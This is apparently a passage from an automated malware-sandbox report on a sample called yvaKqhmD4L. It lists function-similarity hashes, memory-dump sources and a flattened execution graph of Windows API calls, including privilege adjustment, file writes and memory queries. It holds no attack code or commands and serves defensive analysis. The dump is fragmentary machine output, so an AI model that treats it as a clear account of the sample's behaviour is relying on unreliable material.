                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prologctype
                                              • String ID: |zJ
                                              • API String ID: 3037903784-3782439380
                                              • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                              • Instruction ID: d07d786cc98af525224b882929c9fdc042409edde855c0361d6f9bb9f9defca0
                                              • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                              • Instruction Fuzzy Hash: 4BE0E5326011259BE7249B4AC841B9DF3A4FF54B19F10411FE812E3E40CBF0A8408691
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prologctype
                                              • String ID: <oJ
                                              • API String ID: 3037903784-2791053824
                                              • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                              • Instruction ID: adb1feed9bfcf97e16f479b60bbe5f32248a2049b015cf782079584b7d1d790e
                                              • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                              • Instruction Fuzzy Hash: 26E0ED32A021199BEB04AF4DC810BDEF7A8EF41B18F11411EE821A3B51CBB5E820CA80
                                              APIs
                                              • AcquireSRWLockExclusive.KERNEL32(6C2F766C,?,?,652EF5AA,6C0C22D8,6C2F730C), ref: 6C1FA1A9
                                              • ReleaseSRWLockExclusive.KERNEL32(6C2F766C), ref: 6C1FA1E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireRelease
                                              • String ID: lv/l
                                              • API String ID: 17069307-1456510555
                                              • Opcode ID: 25dd17f0ebe80a26c2ec19faa5c4b637d15c046cfd1984427acd54df789c50d2
                                              • Instruction ID: d223e17a769ef076f158924dfb50f2d071db9f636d27a9a0347c767e6a7e8906
                                              • Opcode Fuzzy Hash: 25dd17f0ebe80a26c2ec19faa5c4b637d15c046cfd1984427acd54df789c50d2
                                              • Instruction Fuzzy Hash: C3F05E30644104CBCB109E19C848A65B7F4EB47B74F16022EED7583AC0CB381843CA51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @ K$DJ$T)K$X/K
                                              • API String ID: 0-3815299647
                                              • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                              • Instruction ID: 98637b94113e8fa1b433a365d19d6efbdb71fe76f87fa8d2da1efc8581c503d2
                                              • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                              • Instruction Fuzzy Hash: 1791F2B460530E8BDB04EE66C894BEE73A2AF4130DF108819DC666BB81DB79E94DC751
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D)K$H)K$P)K$T)K
                                              • API String ID: 0-2262112463
                                              • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                              • Instruction ID: fc3e5d09077910ea865fb64753ef56e43d238462a226466d91191356f83a8a3f
                                              • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                              • Instruction Fuzzy Hash: 3351AC31A0520E9BDF10DFA5D840AEEB7B1EF2471CF10452AFC5567A80DB79A94CCBA1

                                              Execution Graph

                                              Execution Coverage:4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0.3%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:38
                                               execution_graph (rendered graph not reproduced; the dump is a flat list of node IDs 73232 through 74283 with edges, cut off at node 74283 d045ab)
                                               Win32 and CRT API nodes recoverable from the dump:
                                               • Privilege adjustment chain: cf9313 GetCurrentProcess, OpenProcessToken -> cf933a LookupPrivilegeValueW -> cf934c AdjustTokenPrivileges -> cf9372 GetLastError -> cf9385 CloseHandle (entered via d01eb9)
                                               • File I/O: cf7c79 WriteFile, cf775c SetFilePointer (with cf7780 GetLastError and cf7796 SetLastError), cf76d6 SetFilePointer GetLastError, cf7d3c SetEndOfFile, cf7c3b SetFileTime, cfbcf8 CloseHandle, d072a3 SetFileSecurityW, cfb8ec GetLastError
                                               • String and variant handling: cf965d VariantClear, cf42e3 CharUpperW, cf4adf wcscmp, cf3097 SysStringLen
                                               • CRT and exception handling: malloc, free, memmove, memcpy, _CxxThrowException, __EH_prolog (d2c0b3, d1719d, d07190, d06fcf, d068b6, cf6c7c and others)
                                               • Aggregated nodes with no API names listed: d04dff (7 API calls, 2 library calls), cf6096 (15 API calls, 2 library calls), d06b5e (69 API calls, 2 library calls), cf8011 (5 API calls), cf823d (10 API calls), cf43b7 (5 API calls), d13558 (10 API calls), d07853 (5 API calls)
74281->74283 74283->74282 74287 d045c3 74283->74287 74288 d045cd __EH_prolog 74287->74288 74316 d079b2 free ctype 74288->74316 74290 d045e8 74317 cf1e40 free 74290->74317 74292 d045f3 74318 d22db9 free ctype 74292->74318 74294 d04609 74319 cf1e40 free 74294->74319 74296 d04610 74320 cf1e40 free 74296->74320 74298 d0461b 74321 cf1e40 free 74298->74321 74300 d04626 74322 d0794c free ctype 74300->74322 74302 d04638 74323 d22db9 free ctype 74302->74323 74304 d0465b 74324 cf1e40 free 74304->74324 74306 d0468e 74325 cf1e40 free 74306->74325 74308 d046ae 74326 d04733 free __EH_prolog ctype 74308->74326 74310 d046be 74327 cf1e40 free 74310->74327 74312 d046e8 74328 cf1e40 free 74312->74328 74314 d045b6 74315 cf1e40 free 74314->74315 74315->74282 74316->74290 74317->74292 74318->74294 74319->74296 74320->74298 74321->74300 74322->74302 74323->74304 74324->74306 74325->74308 74326->74310 74327->74312 74328->74314 74329 d30343 74334 d3035f 74329->74334 74332 d30358 74335 d30369 __EH_prolog 74334->74335 74351 d0139e 74335->74351 74343 d303a2 74368 cf1e40 free 74343->74368 74345 d303aa 74369 d303d8 74345->74369 74350 cf1e40 free 74350->74332 74352 d013b3 74351->74352 74353 d013ae 74351->74353 74355 d301c4 74352->74355 74385 d87ea0 SetEvent GetLastError 74353->74385 74356 d301ce __EH_prolog 74355->74356 74359 d30203 74356->74359 74387 cf1e40 free 74356->74387 74358 d3020b 74361 d30143 74358->74361 74386 cf1e40 free 74359->74386 74366 d3014d __EH_prolog 74361->74366 74362 d30182 74388 cf1e40 free 74362->74388 74364 d3018a 74367 cf1e40 free 74364->74367 74366->74362 74389 cf1e40 free 74366->74389 74367->74343 74368->74345 74370 d303e2 __EH_prolog 74369->74370 74371 d0139e ctype 2 API calls 74370->74371 74372 d303fb 74371->74372 74390 d87d50 74372->74390 74374 d30403 74375 d87d50 ctype 2 API calls 74374->74375 74376 d3040b 74375->74376 74377 d87d50 ctype 2 API calls 74376->74377 74378 d303b7 74377->74378 74379 d3004a 74378->74379 74380 d30054 __EH_prolog 74379->74380 74396 cf1e40 
free 74380->74396 74382 d30067 74397 cf1e40 free 74382->74397 74384 d3006f 74384->74332 74384->74350 74385->74352 74386->74358 74387->74356 74388->74364 74389->74366 74391 d87d59 CloseHandle 74390->74391 74392 d87d7b 74390->74392 74393 d87d64 GetLastError 74391->74393 74394 d87d75 74391->74394 74392->74374 74393->74392 74395 d87d6e 74393->74395 74394->74392 74395->74374 74396->74382 74397->74384 74398 d76bc6 74399 d76bcd 74398->74399 74400 d76bca 74398->74400 74399->74400 74401 d76bd1 malloc 74399->74401 74401->74400 74402 d1d3c2 74403 d1d3e9 74402->74403 74404 cf965d VariantClear 74403->74404 74405 d1d42a 74404->74405 74406 d1d883 2 API calls 74405->74406 74407 d1d4b1 74406->74407 74493 d18d4a 74407->74493 74410 d18b05 VariantClear 74412 d1d4e3 74410->74412 74510 d12a72 74412->74510 74414 cf2fec 3 API calls 74415 d1d594 74414->74415 74416 d1d742 74415->74416 74417 d1d5cd 74415->74417 74541 d1cd49 malloc _CxxThrowException free 74416->74541 74418 d1d7d9 74417->74418 74514 d19317 74417->74514 74544 cf1e40 free 74418->74544 74421 d1d754 74424 cf2fec 3 API calls 74421->74424 74427 d1d763 74424->74427 74425 d1d7e1 74545 cf1e40 free 74425->74545 74426 d1d5f1 74430 d304d2 5 API calls 74426->74430 74542 cf1e40 free 74427->74542 74429 d1d7e9 74432 d1326b free 74429->74432 74433 d1d5f9 74430->74433 74444 d1d69a 74432->74444 74520 d1e332 74433->74520 74434 d1d76b 74543 cf1e40 free 74434->74543 74437 d1d773 74439 d1326b free 74437->74439 74439->74444 74441 d1d610 74527 cf1e40 free 74441->74527 74443 d1d618 74528 d1326b 74443->74528 74446 d1d2a8 74446->74444 74468 d1d883 74446->74468 74449 cf2fec 3 API calls 74450 d1d361 74449->74450 74451 cf2fec 3 API calls 74450->74451 74469 d1d88d __EH_prolog 74468->74469 74470 cf2e04 2 API calls 74469->74470 74471 d1d8c6 74470->74471 74472 cf2e04 2 API calls 74471->74472 74473 d1d8d2 74472->74473 74474 cf2e04 2 API calls 74473->74474 74475 d1d8de 74474->74475 74546 d12b63 74475->74546 74478 d12b63 2 API calls 74479 d1d34f 74478->74479 
74479->74449 74494 d18d54 __EH_prolog 74493->74494 74495 d18da4 74494->74495 74554 cf2b55 malloc _CxxThrowException free _CxxThrowException ctype 74494->74554 74496 d18e15 74495->74496 74497 d18e09 74495->74497 74504 d18e11 74495->74504 74499 d18e2d 74496->74499 74500 d18e5e 74496->74500 74501 d18e21 74496->74501 74498 cf965d VariantClear 74497->74498 74498->74504 74499->74500 74502 d18e2b 74499->74502 74503 cf965d VariantClear 74500->74503 74555 cf3097 malloc _CxxThrowException free SysStringLen ctype 74501->74555 74506 cf965d VariantClear 74502->74506 74503->74504 74504->74410 74508 d18e47 74506->74508 74508->74504 74556 d18e7c 6 API calls __EH_prolog 74508->74556 74511 d12a82 74510->74511 74512 cf2e04 2 API calls 74511->74512 74513 d12a9f 74512->74513 74513->74414 74518 d19321 __EH_prolog 74514->74518 74515 d19360 74516 cf965d VariantClear 74515->74516 74517 d193d0 74516->74517 74517->74418 74517->74426 74518->74515 74557 cf9686 VariantClear 74518->74557 74521 d1e33c __EH_prolog 74520->74521 74522 cf1e0c ctype 2 API calls 74521->74522 74523 d1e34a 74522->74523 74524 d1d608 74523->74524 74558 d1e3d1 malloc _CxxThrowException __EH_prolog 74523->74558 74526 cf1e40 free 74524->74526 74526->74441 74527->74443 74529 d13275 __EH_prolog 74528->74529 74559 d12c0b 74529->74559 74532 d12c0b ctype free 74533 d13296 74532->74533 74564 cf1e40 free 74533->74564 74535 d1329e 74565 cf1e40 free 74535->74565 74537 d132a6 74566 cf1e40 free 74537->74566 74539 d132ae 74539->74446 74541->74421 74542->74434 74543->74437 74544->74425 74545->74429 74547 d12b6d __EH_prolog 74546->74547 74548 cf2e04 2 API calls 74547->74548 74549 d12b9a 74548->74549 74550 cf2e04 2 API calls 74549->74550 74551 d12ba5 74550->74551 74551->74478 74554->74495 74555->74502 74556->74504 74557->74515 74558->74524 74567 cf1e40 free 74559->74567 74561 d12c16 74568 cf1e40 free 74561->74568 74563 d12c1e 74563->74532 74564->74535 74565->74537 74566->74539 74567->74561 74568->74563 74569 d1a7c5 74573 d1a7e9 74569->74573 
74578 d1a96b 74569->74578 74570 d1ade3 74674 cf1e40 free 74570->74674 74572 d1a952 74572->74578 74655 d1e0b0 6 API calls 74572->74655 74573->74572 74595 d304d2 5 API calls 74573->74595 74654 d1e0b0 6 API calls 74573->74654 74574 d1adeb 74675 cf1e40 free 74574->74675 74578->74570 74590 d1ac1e 74578->74590 74602 d1ac6c 74578->74602 74616 d1ad88 74578->74616 74620 d1ad17 74578->74620 74622 d1acbc 74578->74622 74636 d0101c 74578->74636 74639 d198f2 74578->74639 74645 d1cc6f 74578->74645 74656 d19531 5 API calls __EH_prolog 74578->74656 74657 d180c1 malloc _CxxThrowException __EH_prolog 74578->74657 74658 d1c820 5 API calls 2 library calls 74578->74658 74659 d1814d 6 API calls 74578->74659 74660 d18125 free ctype 74578->74660 74579 d1adf3 74580 d1ae99 74579->74580 74589 d304d2 malloc _CxxThrowException free _CxxThrowException memcpy 74579->74589 74581 cf1e0c ctype 2 API calls 74580->74581 74584 d1aea9 memset memset 74581->74584 74586 d1aedd 74584->74586 74585 d1ac26 74662 cf1e40 free 74585->74662 74676 cf1e40 free 74586->74676 74589->74579 74661 cf1e40 free 74590->74661 74592 d1aee5 74677 cf1e40 free 74592->74677 74595->74573 74596 d1aef0 74678 cf1e40 free 74596->74678 74599 d1c430 74680 cf1e40 free 74599->74680 74663 cf1e40 free 74602->74663 74603 d1c438 74681 cf1e40 free 74603->74681 74607 d1c443 74682 cf1e40 free 74607->74682 74608 d1ac85 74664 cf1e40 free 74608->74664 74611 d1c44e 74683 cf1e40 free 74611->74683 74612 d1ac2e 74679 cf1e40 free 74612->74679 74614 d1c459 74671 d18125 free ctype 74616->74671 74668 d18125 free ctype 74620->74668 74621 d1ad93 74672 cf1e40 free 74621->74672 74665 d18125 free ctype 74622->74665 74626 d1acc7 74666 cf1e40 free 74626->74666 74627 d1ad3c 74669 cf1e40 free 74627->74669 74628 d1adac 74673 cf1e40 free 74628->74673 74632 d1ace0 74667 cf1e40 free 74632->74667 74633 d1ad55 74670 cf1e40 free 74633->74670 74684 cfb95a 74636->74684 74640 d198fc __EH_prolog 74639->74640 74691 d19987 74640->74691 74642 d19970 74642->74578 74644 d19911 
74644->74642 74695 d1ef8d 12 API calls 2 library calls 74644->74695 74735 d3cf91 74645->74735 74743 d3f445 74645->74743 74749 d35505 74645->74749 74646 d1cccb 74646->74578 74647 d1cc8b 74647->74646 74753 d1979e VariantClear __EH_prolog 74647->74753 74649 d1ccb1 74649->74646 74754 d1cae9 VariantClear 74649->74754 74654->74573 74655->74578 74656->74578 74657->74578 74658->74578 74659->74578 74660->74578 74661->74585 74662->74612 74663->74608 74664->74612 74665->74626 74666->74632 74667->74612 74668->74627 74669->74633 74670->74612 74671->74621 74672->74628 74673->74612 74674->74574 74675->74579 74676->74592 74677->74596 74678->74612 74679->74599 74680->74603 74681->74607 74682->74611 74683->74614 74686 cfb969 74684->74686 74689 cfb97d 74684->74689 74685 cf7731 5 API calls 74687 cfb9ee 74685->74687 74686->74685 74686->74689 74687->74689 74690 cfb8ec GetLastError 74687->74690 74689->74578 74690->74689 74692 d19991 __EH_prolog 74691->74692 74696 d480aa 74692->74696 74693 d199a8 74693->74644 74695->74642 74697 d480b4 __EH_prolog 74696->74697 74698 cf1e0c ctype 2 API calls 74697->74698 74699 d480bf 74698->74699 74700 d480d3 74699->74700 74702 d3bdb5 74699->74702 74700->74693 74703 d3bdbf __EH_prolog 74702->74703 74708 d3be69 74703->74708 74705 d3bdef 74706 cf2e04 2 API calls 74705->74706 74707 d3be16 74706->74707 74707->74700 74709 d3be73 __EH_prolog 74708->74709 74712 d35e2b 74709->74712 74711 d3be7f 74711->74705 74713 d35e35 __EH_prolog 74712->74713 74718 d308b6 74713->74718 74715 d35e41 74723 d0dfc9 malloc _CxxThrowException __EH_prolog 74715->74723 74717 d35e57 74717->74711 74724 cf9c60 74718->74724 74720 d308c4 74729 cf9c8f GetModuleHandleA GetProcAddress 74720->74729 74722 d308f3 __aulldiv 74722->74715 74723->74717 74734 cf9c4d GetCurrentProcess GetProcessAffinityMask 74724->74734 74726 cf9c6e 74727 cf9c80 GetSystemInfo 74726->74727 74728 cf9c79 74726->74728 74727->74720 74728->74720 74730 cf9cef GlobalMemoryStatus 74729->74730 74731 cf9cc4 GlobalMemoryStatusEx 
74729->74731 74732 cf9d08 74730->74732 74731->74730 74733 cf9cce 74731->74733 74732->74733 74733->74722 74734->74726 74736 d3cf9b __EH_prolog 74735->74736 74737 d3f445 14 API calls 74736->74737 74738 d3d018 74737->74738 74741 d3d01f 74738->74741 74755 d41511 74738->74755 74740 d3d08b 74740->74741 74761 d42c5d 11 API calls 2 library calls 74740->74761 74741->74647 74744 d3f455 74743->74744 75142 d01092 74744->75142 74747 d3f478 74747->74647 74750 d3550f __EH_prolog 74749->74750 75155 d34e8a 74750->75155 74753->74649 74754->74646 74756 d4151b __EH_prolog 74755->74756 74762 d410d3 74756->74762 74759 d41552 _CxxThrowException 74759->74740 74760 d41589 74759->74760 74760->74740 74761->74741 74763 d410dd __EH_prolog 74762->74763 74794 d3d1b7 74763->74794 74765 d412ef 74765->74759 74765->74760 74766 d411f4 74766->74765 74793 cfb95a 6 API calls 74766->74793 74767 d4139e 74767->74765 74769 d413c4 74767->74769 74770 cf1e0c ctype 2 API calls 74767->74770 74801 d01168 74769->74801 74770->74769 74772 d01168 10 API calls 74772->74766 74773 d413de 74845 cf1e40 free 74773->74845 74775 d413da 74775->74773 74777 d413f9 74775->74777 74839 d3ef67 _CxxThrowException 74775->74839 74804 d3f047 74777->74804 74780 d414ba 74843 d40943 50 API calls 2 library calls 74780->74843 74781 d41450 74808 d406ae 74781->74808 74785 d414e7 74844 d22db9 free ctype 74785->74844 74793->74767 74846 d3d23c 74794->74846 74796 d3d1ed 74853 cf1e40 free 74796->74853 74798 d3d209 74854 cf1e40 free 74798->74854 74800 d3d21c 74800->74765 74800->74766 74800->74772 74882 d0111c 74801->74882 74805 d3f063 74804->74805 74806 d3f072 74805->74806 74918 d3ef67 _CxxThrowException 74805->74918 74806->74780 74806->74781 74840 d3ef67 _CxxThrowException 74806->74840 74809 d406b8 __EH_prolog 74808->74809 74919 d403f4 74809->74919 74811 d40877 75040 d3b8dc 74811->75040 74815 d408e3 _CxxThrowException 74818 d408f7 74815->74818 74821 d3b8dc ctype free 74818->74821 74819 cf429a 3 API calls 74837 d40715 74819->74837 74823 d40914 
74821->74823 75050 cf1e40 free 74823->75050 74824 cf1e0c ctype 2 API calls 74824->74837 74828 d4091c 75051 cf1e40 free 74828->75051 74832 d40924 74837->74811 74837->74815 74837->74818 74837->74819 74837->74824 74838 d3ef67 _CxxThrowException 74837->74838 74949 d012a5 74837->74949 74954 d381ec 74837->74954 74838->74837 74839->74777 74840->74781 74843->74785 74844->74773 74845->74765 74855 d3d2b8 74846->74855 74849 d3d25e 74872 cf1e40 free 74849->74872 74852 d3d275 74852->74796 74853->74798 74854->74800 74874 cf1e40 free 74855->74874 74857 d3d2c8 74875 cf1e40 free 74857->74875 74859 d3d2dc 74876 cf1e40 free 74859->74876 74861 d3d2e7 74877 cf1e40 free 74861->74877 74863 d3d2f2 74878 cf1e40 free 74863->74878 74865 d3d2fd 74879 cf1e40 free 74865->74879 74867 d3d308 74880 cf1e40 free 74867->74880 74869 d3d313 74870 d3d246 74869->74870 74881 cf1e40 free 74869->74881 74870->74849 74873 cf1e40 free 74870->74873 74872->74852 74873->74849 74874->74857 74875->74859 74876->74861 74877->74863 74878->74865 74879->74867 74880->74869 74881->74870 74883 d01130 74882->74883 74884 d0115f 74883->74884 74887 cfb668 74883->74887 74906 cfd331 74883->74906 74884->74775 74896 cfb675 74887->74896 74888 cfb864 74910 cf7b7c 74888->74910 74891 cfb8aa GetLastError 74892 cfb6aa 74891->74892 74892->74883 74893 cfb81b 74893->74892 74897 cfb839 memcpy 74893->74897 74894 cf7731 5 API calls 74894->74896 74895 cfb7e7 74895->74888 74899 cf7731 5 API calls 74895->74899 74896->74888 74896->74892 74896->74893 74896->74894 74896->74895 74898 cfb811 74896->74898 74900 cfb7ad 74896->74900 74915 cf7b4f ReadFile 74896->74915 74897->74892 74916 cfb8ec GetLastError 74898->74916 74902 cfb80d 74899->74902 74900->74896 74905 cfb8c7 74900->74905 74914 d76a20 VirtualAlloc 74900->74914 74902->74888 74902->74898 74905->74892 74907 cfd355 74906->74907 74908 cfd374 74907->74908 74909 cfb668 10 API calls 74907->74909 74908->74883 74909->74908 74911 cf7b89 74910->74911 74917 cf7b4f ReadFile 74911->74917 74913 cf7b9a 
74913->74891 74913->74892 74914->74900 74915->74896 74916->74892 74917->74913 74918->74806 74920 d3f047 _CxxThrowException 74919->74920 74921 d40407 74920->74921 74923 d3f047 _CxxThrowException 74921->74923 74924 d40475 74921->74924 74922 d4049a 74925 d404b8 74922->74925 75058 d4159a malloc _CxxThrowException free ctype 74922->75058 74926 d40421 74923->74926 74924->74922 75057 d3fa3f 22 API calls 2 library calls 74924->75057 74928 d404e8 74925->74928 74929 d404cd 74925->74929 74930 d4043e 74926->74930 75054 d3ef67 _CxxThrowException 74926->75054 75060 d47c4a malloc _CxxThrowException free ctype 74928->75060 75059 d3fff0 9 API calls 2 library calls 74929->75059 75055 d3f93c 7 API calls 2 library calls 74930->75055 74931 d40492 74935 d3f047 _CxxThrowException 74931->74935 74935->74922 74936 d404f3 74943 d404e3 74936->74943 75061 d0089e malloc _CxxThrowException free _CxxThrowException memcpy 74936->75061 74938 d404db 74940 d3f047 _CxxThrowException 74938->74940 74940->74943 74941 d4046d 74942 d3f047 _CxxThrowException 74941->74942 74942->74924 74944 d4054a 74943->74944 75062 d3ef67 _CxxThrowException 74943->75062 74944->74837 74945 d40446 74945->74941 75056 d3ef67 _CxxThrowException 74945->75056 74950 d304d2 5 API calls 74949->74950 74951 d012ad 74950->74951 74952 cf1e0c ctype 2 API calls 74951->74952 74953 d012b4 74952->74953 74953->74837 74955 d381f6 __EH_prolog 74954->74955 75063 d3f749 74955->75063 74958 d3823b 75041 d3b8e6 __EH_prolog 75040->75041 75140 cf1e40 free 75041->75140 75043 d3b90d 75141 d2e647 free ctype 75043->75141 75045 d3b915 75050->74828 75051->74832 75054->74930 75055->74945 75056->74941 75057->74931 75058->74925 75059->74938 75060->74936 75061->74936 75062->74944 75064 d3f779 75063->75064 75065 d3f782 _CxxThrowException 75064->75065 75066 d3f797 75064->75066 75065->75066 75066->74958 75140->75043 75141->75045 75144 cfb95a 6 API calls 75142->75144 75143 d010aa 75143->74747 75145 d3f1b2 75143->75145 75144->75143 75146 d3f1bc __EH_prolog 
75145->75146 75147 d01168 10 API calls 75146->75147 75149 d3f1d3 75147->75149 75148 d3f1e6 75148->74747 75149->75148 75150 d3f231 memcpy 75149->75150 75151 d3f21c _CxxThrowException 75149->75151 75154 d3f24c 75150->75154 75151->75150 75152 d3f2f0 memmove 75152->75154 75153 d3f31a memcpy 75153->75148 75154->75148 75154->75152 75154->75153 75156 d34e94 __EH_prolog 75155->75156 75157 cf2e04 2 API calls 75156->75157 75260 d34f1d 75156->75260 75158 d34ed7 75157->75158 75287 d07fc5 75158->75287 75160 d34f37 75162 d34f63 75160->75162 75163 d34f41 75160->75163 75161 d34f0a 75164 cf965d VariantClear 75161->75164 75166 cf2f88 3 API calls 75162->75166 75165 cf965d VariantClear 75163->75165 75167 d34f15 75164->75167 75168 d34f4c 75165->75168 75169 d34f71 75166->75169 75308 cf1e40 free 75167->75308 75309 cf1e40 free 75168->75309 75172 cf965d VariantClear 75169->75172 75173 d34f80 75172->75173 75310 d05bcf malloc _CxxThrowException 75173->75310 75175 d34f9a 75176 cf2e47 2 API calls 75175->75176 75177 d34fad 75176->75177 75178 cf2f1c 2 API calls 75177->75178 75179 d34fbd 75178->75179 75180 cf2e04 2 API calls 75179->75180 75181 d34fd1 75180->75181 75182 cf2e04 2 API calls 75181->75182 75190 d34fdd 75182->75190 75183 d35404 75355 cf1e40 free 75183->75355 75185 d3540c 75356 cf1e40 free 75185->75356 75187 d35414 75357 cf1e40 free 75187->75357 75190->75183 75311 d05bcf malloc _CxxThrowException 75190->75311 75191 d35099 75193 cf2da9 2 API calls 75191->75193 75192 d3541c 75358 cf1e40 free 75192->75358 75195 d350a9 75193->75195 75197 cf2fec 3 API calls 75195->75197 75196 d35424 75359 cf1e40 free 75196->75359 75199 d350b6 75197->75199 75312 cf1e40 free 75199->75312 75200 d3542c 75360 cf1e40 free 75200->75360 75203 d350be 75313 cf1e40 free 75203->75313 75205 d350cd 75206 cf2f88 3 API calls 75205->75206 75207 d350e3 75206->75207 75208 d350f1 75207->75208 75209 d35100 75207->75209 75314 cf30ea 75208->75314 75320 cf3044 malloc _CxxThrowException free ctype 75209->75320 75212 d350fe 75321 
d01029 6 API calls 75212->75321 75214 d3511a 75215 d35120 75214->75215 75216 d3516b 75214->75216 75322 cf1e40 free 75215->75322 75328 d0089e malloc _CxxThrowException free _CxxThrowException memcpy 75216->75328 75219 d35128 75323 cf1e40 free 75219->75323 75220 d35187 75223 d304d2 5 API calls 75220->75223 75222 d35130 75324 cf1e40 free 75222->75324 75225 d351ba 75223->75225 75329 d30516 malloc _CxxThrowException ctype 75225->75329 75226 d35138 75325 cf1e40 free 75226->75325 75229 d351c5 75233 d351f5 75229->75233 75234 d3522d 75229->75234 75230 d35140 75326 cf1e40 free 75230->75326 75232 d35148 75327 cf1e40 free 75232->75327 75330 cf1e40 free 75233->75330 75236 cf2e04 2 API calls 75234->75236 75282 d35235 75236->75282 75238 d351fd 75331 cf1e40 free 75238->75331 75241 d35205 75332 cf1e40 free 75241->75332 75242 d3532e 75341 cf1e40 free 75242->75341 75245 d3520d 75333 cf1e40 free 75245->75333 75246 d35347 75246->75183 75248 d35358 75246->75248 75342 cf1e40 free 75248->75342 75249 d35215 75334 cf1e40 free 75249->75334 75251 d353a3 75348 cf1e40 free 75251->75348 75253 d35360 75343 cf1e40 free 75253->75343 75254 d3521d 75335 cf1e40 free 75254->75335 75258 d35368 75344 cf1e40 free 75258->75344 75260->74647 75262 d353bc 75349 cf1e40 free 75262->75349 75263 d35370 75345 cf1e40 free 75263->75345 75267 d353c4 75350 cf1e40 free 75267->75350 75268 d35378 75270 d304d2 5 API calls 75270->75282 75272 d353cc 75351 cf1e40 free 75272->75351 75276 d353d4 75352 cf1e40 free 75276->75352 75279 d353dc 75282->75242 75282->75251 75282->75270 75285 cf2e04 2 API calls 75282->75285 75336 d3545c 5 API calls 2 library calls 75282->75336 75337 d01029 6 API calls 75282->75337 75338 d0089e malloc _CxxThrowException free _CxxThrowException memcpy 75282->75338 75339 d30516 malloc _CxxThrowException ctype 75282->75339 75340 cf1e40 free 75282->75340 75285->75282 75290 d07fcf __EH_prolog 75287->75290 75288 d0800a 75370 cf9736 VariantClear 75288->75370 75289 d08061 75292 d0805c 75289->75292 75306 d08025 
75289->75306 75290->75289 75290->75292 75293 d08019 75290->75293 75296 d07ff4 75290->75296 75369 cf9630 VariantClear 75292->75369 75293->75296 75297 d0801e 75293->75297 75294 d080b8 75299 cf965d VariantClear 75294->75299 75296->75288 75361 cf950d 75296->75361 75300 d08042 75297->75300 75301 d08022 75297->75301 75303 d080c0 75299->75303 75367 cf9597 VariantClear 75300->75367 75304 d08032 75301->75304 75301->75306 75303->75160 75303->75161 75366 cf9604 VariantClear 75304->75366 75306->75288 75368 cf95df VariantClear 75306->75368 75308->75260 75309->75260 75310->75175 75311->75191 75312->75203 75313->75205 75315 cf30fd 75314->75315 75315->75315 75316 cf1e0c ctype 2 API calls 75315->75316 75317 cf311d 75315->75317 75318 cf3113 75316->75318 75317->75212 75377 cf1e40 free 75318->75377 75320->75212 75321->75214 75322->75219 75323->75222 75324->75226 75325->75230 75326->75232 75327->75260 75328->75220 75329->75229 75330->75238 75331->75241 75332->75245 75333->75249 75334->75254 75335->75260 75336->75282 